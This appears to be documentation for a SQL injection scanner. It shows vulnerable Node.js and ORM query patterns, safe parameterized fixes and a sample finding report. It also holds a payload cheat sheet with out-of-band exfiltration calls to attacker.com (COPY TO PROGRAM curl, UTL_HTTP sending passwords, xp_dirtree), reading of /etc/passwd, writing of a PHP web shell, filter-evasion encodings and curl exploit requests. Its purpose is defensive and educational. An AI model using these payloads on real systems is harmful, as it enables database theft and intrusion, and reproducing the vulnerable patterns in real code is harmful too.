SQL Injection Detection

// Vulnerable: Unparameterized query
const query = `SELECT * FROM users WHERE id = ${userId}`;
db.query(query);

// Vulnerable: String interpolation in WHERE clause
app.get('/search', (req, res) => {
  const sql = `SELECT * FROM products WHERE name LIKE '%${req.query.q}%'`;
  // Exploitable with: ?q=' OR '1'='1
});

-- Esprit tests sleep functions
SELECT * FROM orders WHERE id = 1 AND SLEEP(5)
SELECT * FROM users WHERE email = 'test' AND pg_sleep(5)

-- DNS/HTTP callbacks detected
LOAD_FILE(CONCAT('\\\\',database(),'.attacker.com\\a'))  -- MySQL
COPY (SELECT '') TO PROGRAM 'curl http://attacker.com'   -- PostgreSQL

// Sequelize - VULNERABLE
await User.findAll({
  where: sequelize.literal(`name = '${userName}'`)
});

// Knex - VULNERABLE
await knex('users')
  .whereRaw(`email = '${userEmail}'`)
  .select('*');

// TypeORM - VULNERABLE
await repository.query(
  `SELECT * FROM users WHERE id = ${userId}`
);

// VULNERABLE: User-controlled table/column names
const column = req.query.sort; // "email"
await knex('users')
  .orderBy(column, 'desc'); // Can inject: "(CASE WHEN ... THEN ... END)"

// VULNERABLE: JSON containment operators with raw fragments
const filter = req.body.filter;
await knex('users')
  .whereRaw(`metadata @> '${JSON.stringify(filter)}'`);

-- Version/metadata extraction
SELECT @@version, database(), user()

-- Error-based extraction
SELECT extractvalue(1, concat(0x7e, (SELECT password FROM users LIMIT 1)))

-- File access (requires FILE privilege)
SELECT LOAD_FILE('/etc/passwd')
SELECT 'shell' INTO DUMPFILE '/var/www/shell.php'

-- Time delay
SELECT SLEEP(5)

-- Version/metadata
SELECT version(), current_user, current_database()

-- Time delay
SELECT pg_sleep(5)

-- JSONB extraction for blind SQLi
SELECT data->>'password' FROM users WHERE id = 1

-- Conditional sleep for boolean blind
SELECT CASE WHEN (SELECT COUNT(*) FROM users WHERE role='admin') > 0 
  THEN pg_sleep(5) 
  ELSE pg_sleep(0) 
END

-- Version/metadata
SELECT @@version, db_name(), system_user

-- Time delay
WAITFOR DELAY '0:0:5'

-- Out-of-band DNS
EXEC xp_dirtree '\\\\attacker.com\\share'

-- Version/metadata
SELECT banner FROM v$version

-- Time delay
BEGIN DBMS_LOCK.SLEEP(5); END;

-- Out-of-band HTTP
SELECT UTL_HTTP.REQUEST('http://attacker.com/'||password) FROM users

-- Comments and special spaces
UNION/**/SELECT
UNION%0ASELECT
UNION%09SELECT

-- Case mixing and encoding
UnIoN SeLeCt
U%4eION SELECT
0x554e494f4e -- Hex-encoded UNION

-- Scientific notation and hex
SELECT * FROM users WHERE id = 1e0
SELECT * FROM users WHERE name = 0x61646d696e -- 'admin'

// Vulnerable code: src/api/search.js:42
app.get('/api/search', async (req, res) => {
  const { query, sort } = req.query;
  const sql = `
    SELECT id, name, email 
    FROM users 
    WHERE name LIKE '%${query}%' 
    ORDER BY ${sort}
  `;
  const results = await db.query(sql);
  res.json(results);
});

# Boolean-based extraction
curl 'http://app.com/api/search?query=test%27%20OR%20%271%27=%271&sort=name'

# Time-based blind
curl 'http://app.com/api/search?query=test%27%20AND%20SLEEP(5)--&sort=name'

# UNION-based extraction
curl 'http://app.com/api/search?query=%27%20UNION%20SELECT%201,@@version,user()--&sort=name'

// Vulnerable code: src/controllers/users.js:87
async function listUsers(req, res) {
  const sortBy = req.query.sort || 'created_at';
  const users = await User.findAll({
    order: [[sequelize.literal(sortBy), 'DESC']]
  });
  res.json(users);
}

# Extract admin email via CASE WHEN
curl 'http://app.com/users?sort=(CASE%20WHEN%20(SELECT%20email%20FROM%20users%20WHERE%20role=%27admin%27%20LIMIT%201)%20LIKE%20%27a%25%27%20THEN%201%20ELSE%202%20END)'

// SAFE: Parameterized query
const sql = 'SELECT * FROM users WHERE id = ? AND name = ?';
const results = await db.query(sql, [userId, userName]);

// SAFE: ORM parameter binding
await User.findAll({
  where: {
    email: userEmail,
    status: 'active'
  }
});

// SAFE: Whitelist column names
const ALLOWED_SORT = ['name', 'email', 'created_at'];
const sortBy = ALLOWED_SORT.includes(req.query.sort) 
  ? req.query.sort 
  : 'created_at';

await knex('users').orderBy(sortBy, 'desc');

// SAFE: Knex with proper binding
await knex('users')
  .where('email', 'like', `%${userInput}%`)
  .orderBy('created_at', 'desc');

// SAFE: Sequelize without raw fragments
await User.findAll({
  where: {
    name: {
      [Op.like]: `%${userName}%`
    }
  },
  order: [['created_at', 'DESC']]
});

[CRITICAL] SQL Injection in search endpoint
Location: src/api/search.js:42
Oracle: Boolean-based
DBMS: PostgreSQL 14.2

Vulnerable Code:
  const sql = `SELECT * FROM users WHERE name LIKE '%${query}%'`;

Proof:
  Request 1: ?query=test' OR '1'='1  → 50 results
  Request 2: ?query=test' OR '1'='2  → 0 results
  
Impact:
  - Authentication bypass via manipulated predicates
  - Full database read access
  - Potential data modification
  
Remediation:
  Use parameterized query:
  const sql = 'SELECT * FROM users WHERE name LIKE $1';
  db.query(sql, [`%${query}%`]);